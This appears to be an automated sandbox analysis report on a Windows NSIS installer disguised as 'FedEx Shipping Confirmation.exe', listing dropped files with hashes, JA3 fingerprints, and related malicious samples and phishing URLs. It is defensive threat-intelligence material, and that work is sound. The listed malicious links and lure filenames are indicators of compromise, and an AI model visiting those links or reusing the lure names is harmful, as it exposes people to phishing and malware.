	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl8RKvJCjgfWXgpyGiQbouwIVFCzJZdO6C7IEJWnFiPmUdkD_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOJptL-2BsSl02HxRvbllikFuSJtHHDkVwyIj5AuFgiubBu9sTxc8j0-2BQG5wldcZa7WyDp4BZYdRmFKi1MU2RpCFoGVLX1rLVx-2BFFfe8ZtbBDm0OusvqG9hc8jycErQH9w4yo0iZBNb6ruS35AQpqe-2Bn9sSG0dYdsEjJuPPD68-2FQoiA15kbRIRZcVBuBtywmpClclGh64Ps2rLg6E3U3-2Ft-2B24zaJbCf8tvrjozgadicpaRwQ3KIy53pMZsOUCbTeEqGc-3D#bGFtYmVydC5nZW9yZ2lhQGFpZGIub3Jn	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl8RKvJCjgfWXgpyGiQbouwIVFCzJZdO6C7IEJWnFiPmUdkD_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOJptL-2BsSl02HxRvbllikFuSJtHHDkVwyIj5AuFgiubBu9sTxc8j0-2BQG5wldcZa7WyDp4BZYdRmFKi1MU2RpCFoGVLX1rLVx-2BFFfe8ZtbBDm0OusvqG9hc8jycErQH9w4yo0iZBNb6ruS35AQpqe-2Bn9sSG0dYdsEjJuPPD68-2FQoiA15kbRIRZcVBuBtywmpClclGh64Ps2rLg6E3U3-2Ft-2B24zaJbCf8tvrjozgadicpaRwQ3KIy53pMZsOUCbTeEqGc-3D#bGFtYmVydC5nZW9yZ2lhQGFpZGIub3Jn	Get hash	malicious	Unknown	Browse	172.67.202.66
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl8RKvJCjgfWXgpyGiQbouwIVFCzJZdO6C7IEJWnFiPmUdkD_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOJptL-2BsSl02HxRvbllikFuSJtHHDkVwyIj5AuFgiubBu9sTxc8j0-2BQG5wldcZa7WyDp4BZYdRmFKi1MU2RpCFoGVLX1rLVx-2BFFfe8ZtbBDm0OusvqG9hc8jycErQH9w4yo0iZBNb6ruS35AQpqe-2Bn9sSG0dYdsEjJuPPD68-2FQoiA15kbRIRZcVBuBtywmpClclGh64Ps2rLg6E3U3-2Ft-2B24zaJbCf8tvrjozgadicpaRwQ3KIy53pMZsOUCbTeEqGc-3D#bGFtYmVydC5nZW9yZ2lhQGFpZGIub3Jn	Get hash	malicious	Unknown	Browse	172.67.202.66
	http://journalscene.secondstreetapp.com/api/organization_user_email_verifications?token=npv0kjeneci&opid=1033948&lrt=rmsqe55tykx&bf=bc07ae1cf7bbffb3bcd5bc7a10f031b8&ip=207.144.57.39&redirect=https://unsus3.ru/oth/chameleon/#tbianetskaya@pierceatwood.com	Get hash	malicious	Unknown	Browse	104.21.91.69
VIRPUS	https://ellenlightning.slickplan.com/wa4vxper/content/svgx2f4srvbqeat19e7?language=en_US	Get hash	malicious	HTMLPhisher	Browse	104.153.208.178
	5oBtUcfYbD.elf	Get hash	malicious	Mirai, Moobot	Browse	50.115.175.126
	YMloXummt3.elf	Get hash	malicious	Moobot	Browse	5.226.170.36
	https://click.pstmrk.it/3s/bfsdqbhdfqsbhdf.blogspot.com%2F/lvid/EsqzAQ/AQ/3d6bdb2c-8ba6-4238-a213-e9cee32f03d6/2/EhSnAlFZDV#cl/210168_smd/274/3553163/3122/3317/328533	Get hash	malicious	Unknown	Browse	50.115.172.236
	http://9k1.lawstore.me/?dD1jJmQ9MjIwMjUmbD01NDIzJmM9MTU5ODA5JmF1PTA=	Get hash	malicious	Phisher	Browse	50.115.174.138
	http://i84.lawstore.me/?dD1jJmQ9MjIwNDImbD01NDE2JmM9MTUxNDkmYXU9MA==	Get hash	malicious	Phisher	Browse	50.115.174.138
	Invoices.xls	Get hash	malicious	FormBook, GuLoader	Browse	50.115.174.254
	Invoices.exe	Get hash	malicious	FormBook, GuLoader	Browse	50.115.174.254
	SecuriteInfo.com.NSIS.Injector.SPOW.tr.7679.1853.exe	Get hash	malicious	FormBook, GuLoader	Browse	50.115.174.254
	JOU23013126.exe	Get hash	malicious	FormBook, GuLoader	Browse	50.115.174.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Remesas Aceptadas.PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	factura n#U00famero 55242.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	FACTURA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	FACTURA PENDIENTE DE COBRO P24PM0531563.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Nakliye belgeleri.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Request for Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.7591.31980.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	Vak#U0131fBank - #U00d6deme onay makbuzu 20240826.pdf.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	#U00d6deme Talebi_27.08.2024.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	New_Order_Big_Bag_PDF.exe	Get hash	malicious	FormBook	Browse	149.154.167.220
	Faktura.vbs	Get hash	malicious	Remcos	Browse	149.154.167.220
	PAYMENT SV 31 FATURA.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PAYMENT SV 31 FATURA.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PO_111234242 6553432.exe	Get hash	malicious	Xeno Stealer	Browse	149.154.167.220
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl8RKvJCjgfWXgpyGiQbouwIVFCzJZdO6C7IEJWnFiPmUdkD_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOJptL-2BsSl02HxRvbllikFuSJtHHDkVwyIj5AuFgiubBu9sTxc8j0-2BQG5wldcZa7WyDp4BZYdRmFKi1MU2RpCFoGVLX1rLVx-2BFFfe8ZtbBDm0OusvqG9hc8jycErQH9w4yo0iZBNb6ruS35AQpqe-2Bn9sSG0dYdsEjJuPPD68-2FQoiA15kbRIRZcVBuBtywmpClclGh64Ps2rLg6E3U3-2Ft-2B24zaJbCf8tvrjozgadicpaRwQ3KIy53pMZsOUCbTeEqGc-3D#bGFtYmVydC5nZW9yZ2lhQGFpZGIub3Jn	Get hash	malicious	Unknown	Browse	149.154.167.220
	DHL WayBill, Invoice & Packing List.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFgXXvv2-2BWxavJhSFh1X9YeE09JxYfGZOrfNXpE1b1zMSec6V_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZNvtRLmuq9nwTUBLvlyUQLSTjA0dDcTtmNJHz5AQBzdlGtncKRz08-2BYDBtkpKhh0KX17i2fmd5it7ecx-2FWvhsbD-2BwYBTTPKQ3j-2FAyMvTur79Dsx-2FPO7GwMrKARE8VWDjAjvStKY75qeeBLXHuDipEV3KKO3k4ABqkQG2RlytfHIDieNQv9UnoJapwQuVaik0jLuTXarvnnfl3sa3LYFT4h4hVVagLZJwfqoXYBXcReN-2F1X4eM9FZF-2BvVOXIZ-2BqDy2Q-3D	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\LangDLL.dll	IMG_00991ORDER_FILES.exe	Get hash	malicious	FormBook, GuLoader	Browse
	IMG_00991ORDER_FILES.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll	IMG_00991ORDER_FILES.exe	Get hash	malicious	FormBook, GuLoader	Browse
	IMG_00991ORDER_FILES.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx	Get hash	malicious	Unknown	Browse
	AKgHw6grDP.exe	Get hash	malicious	GuLoader	Browse
	AKgHw6grDP.exe	Get hash	malicious	GuLoader	Browse
	PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse
	PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe	Get hash	malicious	GuLoader	Browse
	RFQ-SMC-PO-5547-SUPPLY.com.exe	Get hash	malicious	GuLoader	Browse
	RFQ-SMC-PO-5547-SUPPLY.com.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Kustodens.Emp

Download File

Process:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	102586
Entropy (8bit):	2.6572268340357827
Encrypted:	false
SSDEEP:	1536:tgMU/b+/0baTOfV/y6FXqBbUP5HgflgB9iHLnfTXFaUyhGcvk:06KFzWHFyRM
MD5:	F2D067FD06FC55360CC793582DFE9279
SHA1:	D5823007A34A2E8E6F75620639B781C91F1C90AD
SHA-256:	15E724A4A4EC10A915470FB5AA7AF5A4281B324754A6A9FA10E902702907D025
SHA-512:	C4C1C1F417EF2999C44D87DB3F68523FAC37DE969900E8467E1A341EB823B306FE7CF4D763B25D5C0B1D9C295FC04F652E41A1DC24A14645BAC6699DA33991EF
Malicious:	false
Reputation:	low
Preview:	000000180000D5D5000063005A00000000D7D700161616161600010080800000000700A5008C8C00FBFBFBFB0000A80000A50000000000340048007A0090909090909090006E00002424240000B9B900000000B4000062006C6C000000080000E500252525250000007000008400FFFFFF000C00004F4F001100F10000000000DD00B2003D0000F9000000260061616100160000000000CE00D7D7D7D700360000E2002300000000001E00B8B800AC0000B3B3B3B3B3B3B300575700005500919191000000B100D800C3C3C3C300004A4A00F2F2F2F2009F00F800000000005E006B0000444400B1B100005900004B0000040000FD00DCDCDC000000EBEBEB000000A9A90070004545454545006400004949000000B4004B00D500007A0074740000580000000000005000000000003000DDDDDD000068686868006600000000F2F2000000D300D200565656003F000000E6E6E6003D00F000D7D70000AF003D3D00007878787800000000DEDE0000009F006500E9E9E900DCDC00003E00007070001D000000E3E3E3E3000025250000C900A5A500FE00008C8C008800FF00CE000000F2F2003600B3B3005858580004040000B5000000000B0000C600000000003000ADADADADADADAD00D40000000000CA009E9E0000000000A2A2A2000000002F2F00000000380000006666660000000000D4

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Roundness.ind

Download File

Process:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
File Type:	data
Category:	dropped
Size (bytes):	385015
Entropy (8bit):	1.253279247179919
Encrypted:	false
SSDEEP:	1536:kVTcKVFuJi5LXKLywcEhXygCilGHIQXMUmMAI:ywKLNLaLywRXygCilGzmMAI
MD5:	84182132BEAC6B4CDD42AE3C3504778F
SHA1:	9844B9B4ABEAC7B410809A582FE2E41BD38876A3
SHA-256:	5A2A01A88EC9FF56B80D957E4C5891A020435407F81DADA05DE58165C0C86F2D
SHA-512:	054C17E8AC2EDED927F24E77A81FBA74498C9F3ABD07F5E42D6F9E20A58D47D9C30FF1060CC8626DE93FDD5BBA2A0503FF61EC7F4F70858871C15E63DDC48A7F
Malicious:	false
Reputation:	low
Preview:	....E..........;................../..r.....5...............e......9...............................S............................................e..........................E..........................W.................................8....................j......3....................X............................Ql....T.................>g...'.............[...l...P.................................\|................................q.....................3........v......t....H............................................s.................................................................................................................................................f....................................................................(..................................................;..$..................................................................o.-.........................................................l................. ...............................................Q......................

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\bucrane.erh

Download File

Process:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
File Type:	data
Category:	dropped
Size (bytes):	186880
Entropy (8bit):	1.2601075629320995
Encrypted:	false
SSDEEP:	768:597pZQKUv2av3tuZ8qbY2vFhkyd8MBkwaKKKbwspvRxtm8dBct2pEW5x1dGkrKLB:Ve2aPPET8MOwaKGeR//1T9dO
MD5:	AA2CD52ABEA96B7E317691ADD713125D
SHA1:	B34046DE9D9A275896762FD53A2DFF2D382EAE56
SHA-256:	C6AD2DCC3B851E06A60FA705CBAA83AADBEC68B10E24CA667088E8153973A7B2
SHA-512:	AD454262C5804887A9596D5CFFCC64D86EB1ED92813A5A37F57D9FCCA21D9C2EF465E51F05879F65BABA7752252B9FEC6352CFB5F678B21D3412B6906EB07C26
Malicious:	false
Reputation:	low
Preview:	..N......................p..........................................%.............................................................V.............z.N........................i......................................................................................................,(^.............b..n.....&...........................S..................>...................C.................................~...........................K.......................................B.....*..........L.....................j..............!...........O................S................a....C......x...y................................@..............................$...........................................N.........................g.................R...................................@.....................F...........+............................S..........R..............................................g.........................................................................................................

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\freemanship.txt

Download File

Process:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
File Type:	ASCII text, with very long lines (304), with no line terminators
Category:	dropped
Size (bytes):	304
Entropy (8bit):	4.14301130689188
Encrypted:	false
SSDEEP:	6:3CUzIrGx4igCDYUuTjAtLGafWWl2iEOQkAtj/jLsTzOwJT4HCALn:3CCF4igCDYA5Ga+Wl2iEOTAJryO8MHCu
MD5:	EF6FDEDE5EA8DBEF391FEC35BE82A5FC
SHA1:	6C88262F78E8B11651EEB6534F09C65CD0A8F8BB
SHA-256:	37B39724FD3B7FE48E1D65DA1A69BF4DBF809F34C67BAC7C4DA13F93DA9BE856
SHA-512:	5FB53ADEADB7C464A13EEECE64ADD35F972425D55447FFB84A277689BA3F4D5861A43B2883CB0744F98F164F2802C567F9969F777B98CE4609D28A64ED1101FD
Malicious:	false
Reputation:	low
Preview:	skydestigens dilettanist defmrkers,drmmene sprometrets taklingens crokinole ligegladestes,ultraremuneration dkketallerkners uncustomed filoversigterne.atomize koncentrationsevnens arthropodal epilepsis vakuums stabelvis lnregulering,catv skrivemaskinebordenes skydningerne.solanin godkendelsens gasogene.

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\kildent.Ocu

Download File

Process:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
File Type:	data
Category:	dropped
Size (bytes):	313696
Entropy (8bit):	7.485570046439676
Encrypted:	false
SSDEEP:	6144:wKkwUHbKTUXiPkuyQ2kmqD4wScCEw1Lxso3+yNkAz5P:zUoU5Dk3D4wSn9dxsskAzx
MD5:	73D7B249C1D5B8FB5A12C82C02F0BB36
SHA1:	E59AD89E8464C5D32C6AE3C48FA5DDF95C0260BB
SHA-256:	72391E2AEC492DC97A5E0A43C85BD608CB3417FEC44F92027428D3E9924D1A0B
SHA-512:	3AF747C48D5C52A860333BA37E8D14211CEE9F76F8C4684CDC15834BB4B8022C47ED88B6240B26991BF181F1D15CCF35C82FFAE6B31AD56B758509A9B0640C75
Malicious:	false
Preview:	........._._..............Y...3.3.qqq................G.qq...........................................................................e......................................)............;;....{..A........ .."....!!.........:.............(.W.........cc..;;..........ww.........[....000...m..L...(..p.................++.......gg...88......................x.....99.....44..............^^^..........................l....S............. .....??.................u....`...h......K...M..................DD.............GGGG..............m..x..........tttt................}}........................Q..........n..................ttt..22.2.................2.....55..........``..............*............D........AAA..D..........x.........B....................t....mm.............\|\|..T...C..k....].\|.............1.......bb................##...\.................TTTT......b......b.....MMM.$..................].\|\|\|\|\|\|\|\|\|\|....s............'''......)))......aa............{{..............\................=.(.k........

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\pressurization.pra

Download File

Process:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
File Type:	data
Category:	dropped
Size (bytes):	269664
Entropy (8bit):	1.2446463566225683
Encrypted:	false
SSDEEP:	768:3wSokH49c7ZKiDm+1Qer3C4XkGB3luG3fCHoEHKM/yP35tuIJ95oV31XfCp43UtM:55+1GbuKvP32IqV1fmPU0VicgRx
MD5:	084CDF1FE8920EACBC8DC0E839D9E5A7
SHA1:	5BB2E4E15941AC2AB4287A58F671B82DA5C9A384
SHA-256:	A6EB01651C833919FC27F9B7DD2B5C6D9F9DD8766BC7848679B5E664ECC6C8A7
SHA-512:	F856C41F540B7BD8233179CC752E63E4C88C1BBC38739B4FAF3DA09675B13FBC0219458AFE95D4C1DD481B35BB69DC9B66C2269C64B106DE3659A51CE9AE1B42
Malicious:	false
Preview:	...E.......c...............................0...............................................................c........................................n.......Y................................P..........................................................................................$........................................~.........................1...Z....................................m......................=.......................U............................................[....................................}.=..................-..........................................................t........................-....................m..............V...................................................................q............m.X..................................c....................................................................................'.........................T...R.............................................................^............\|................................

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\restriktivitets.bnk

Download File

Process:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
File Type:	data
Category:	dropped
Size (bytes):	131403
Entropy (8bit):	1.2526174536345023
Encrypted:	false
SSDEEP:	768:GGj5fMy6uanycN+gN/qEN+bHeC6roJdAGpeBgXU9ZWNAnu/Fkutb:L3l0fDkwaPA
MD5:	9AD6681DD2B309E6ACE142096F9E2870
SHA1:	5E02434342A98589A29B7E389E88DD4C60F09A8A
SHA-256:	576D2CD521891CF9C598B3CA0DADB89BD36CDE96B3F86F1CD27BF4FFCCE863CB
SHA-512:	28CFECE5E00AAB59758864503F4A9058EEF2FDFC8B73204ABF1E3B41011FBE5D9EAC3595E2EFA0E3B740B82F285B7EC8E42EA5DD42C39E5EFF39735A9C051CBB
Malicious:	false
Preview:	.............................>...................a...............................................>...............................Z......2.....................................................................U.................................J.....................................................................A@...Y..C..................1{.......................................................(.....................................................^......................................................V...........5.............................d.................................................+....{............................N........?.......................c.........y.........................................U................................:...................Y..........................................O....................!.......D.................................................}.....................................................................................................".......

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\tresindstyvendedeles.ord

Download File

Process:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
File Type:	data
Category:	dropped
Size (bytes):	407199
Entropy (8bit):	1.2437541055056829
Encrypted:	false
SSDEEP:	1536:Jm/FJf9qdyY/zMFRdfxHg2jUsscLrP6d2i2SJ:Itlw7zMFHx/jUqOd2SJ
MD5:	D2D56C0A1BC3F0AE364C30A638393597
SHA1:	B564662188D504D42B22E18A487BF35503B87AF5
SHA-256:	E88BB71C91C537060F76CD2EF8633B767BFD720EFD7AF6F8300BA6883249EACB
SHA-512:	2756334999CFEE833DAC050193745C85D50A3884FCB18220243C1A71086B51E6FF6EB165189BE7748AABB6098F9BD693EB25E539D2ADE56486FA95CB297FD023
Malicious:	false
Preview:	..........................................................=...O}.............C.......................................................................................b..........0.......................................................m...................................................................................................&........-.........D..........................................................%....."......................................................z.......)....................................x............................&..........................................4.....[......V.........................................................=.J..........................................................................................Q.............z........................................................."%F.zt.....................=...............................................A......Y....................f..................................O.......................#.............

C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\LangDLL.dll

Download File

Process:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	3.817430038996001
Encrypted:	false
SSDEEP:	48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
MD5:	549EE11198143574F4D9953198A09FE8
SHA1:	2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
SHA-256:	131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
SHA-512:	0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....C.f...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.804946284177748
Encrypted:	false
SSDEEP:	192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
MD5:	192639861E3DC2DC5C08BB8F8C7260D5
SHA1:	58D30E460609E22FA0098BC27D928B689EF9AF78
SHA-256:	23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
SHA-512:	6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse Filename: AKgHw6grDP.exe, Detection: malicious, Browse Filename: AKgHw6grDP.exe, Detection: malicious, Browse Filename: PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe, Detection: malicious, Browse Filename: PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe, Detection: malicious, Browse Filename: RFQ-SMC-PO-5547-SUPPLY.com.exe, Detection: malicious, Browse Filename: RFQ-SMC-PO-5547-SUPPLY.com.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\UserInfo.dll

Download File

Process:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.3415738744933092
Encrypted:	false
SSDEEP:	48:qK5HC+J4apHT1wH8l9QcXygHg0ZShMmj3jk6TbGr7X:5QiRzuHOXTA0H6jk6nGr7X
MD5:	F8B6DD1F9620BE4EF2AD1E81FB6B79FA
SHA1:	F06C8C8650335BACE41C8DBE73307CBE4E61B3B1
SHA-256:	A921CC9CC4AF332BE96186D60D2539CB413DFA44CFD73E85687F9338505FF85E
SHA-512:	F15811088ECDE4CD0C038DB2C278B7214E41728E382B25C65C2EB491BC0379C075841398E8C99E8CCEBA8BE7E8342BC69D35836EBE9B12EBEBFF48D01D5FA61A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\nsDialogs.dll

Download File

Process:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.157714967617029
Encrypted:	false
SSDEEP:	96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
MD5:	B7D61F3F56ABF7B7FF0D4E7DA3AD783D
SHA1:	15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
SHA-256:	89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
SHA-512:	6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....C.f...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\FedEx Shipping Confirmation.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	5.295306975422517
Encrypted:	false
SSDEEP:	96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
MD5:	11092C1D3FBB449A60695C44F9F3D183
SHA1:	B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
SHA-256:	2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
SHA-512:	C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.322633759181373
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FedEx Shipping Confirmation.exe
File size:	749'680 bytes
MD5:	f48ad078b3b7bec3ef37e33619dbe943
SHA1:	3f13e731e2819f3032bf6514cd72c0d68eae13bc
SHA256:	5c165586ed7a8f62f8d8fe850d874ede748092d4dbf54667ce8b02b4081c4cfe
SHA512:	5f3a180a3dee732a50c3ca48b033f07aacb2d08a30f813a6c7b5d2e8709fe1dc3df847625e3a45064c85b37a28d33485331f08f04bc202620decf51d1ad21cd9
SSDEEP:	12288:JGJ5M7AauPSWS4CTrkUcankl/WdQGMi7B1mSwIhCjVnU:JGfyTuPSWS4CToWK/WdQWB1mSlCjVU
TLSH:	01F4ADD1E48B900DD9F822FA0634A77ECF9B5C343CE96AED2FD336AB5AB2511254C405
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L....C.f.................h....:....

File Icon


Icon Hash:	4dd2d8e4e4f892cc

Static PE Info

General

